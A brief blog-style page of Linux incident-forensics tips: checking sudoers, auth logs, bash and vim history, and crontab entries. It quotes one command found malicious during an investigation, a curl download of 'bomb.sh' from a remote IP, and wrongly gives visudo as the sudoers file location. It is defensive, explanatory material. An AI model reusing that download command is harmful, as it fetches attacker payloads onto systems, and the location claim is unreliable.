Linux Incident Forensics - Tips
Edit the Sudoer files.
The file that will keep all the information about the SUDOERS. This command provides basic sanity checks, and checks for parse errors. If the sudoers file is currently being edited you will receive a message to try again laterSUDOES File Location
/usr/sbin/visudo
Its a good place to start when doing a foresncics analysis on a machine.
Checking .log files
cat /var/log/auth.log*
cat /var/log/auth.log* | grep -i COMMAND
The -i flag is to make it non case sensitive.
It's also a good idea to search for executables that were open like .sh, .py, .php files
Check the Command History
Every user has a .bash_history file inside their home directory, use this file to investigate commands that were used by the user.Sometimes an individual might compromised more than one account,so we should be mindful that he could download a payload with account X and execute the payload with account Y
Download a File from webserver using curl
On this example this is the command we have found to be malicous on our analysus
curl 10.10.158.38:8080/bomb.sh --output bomb.sh
Vim History
Vim is the text editor that we can use from inside the Linux terminal, it also hold historical information that can be useful when doing an incident forensics. Check the following file, usually located inside the home directory of the user.At the top of the file there will be information on where the file was saved.
.viminfo
Scheduled Tasks
Malicious file will often be stored to be executed as an schedulled task. We can run the following to check all schedulled tasks on the system.
cat /etc/crontab
crontab.guru
to help translate to human format the date/hour the crontab job was schedulled the HOUR:MINUTE
0 Comments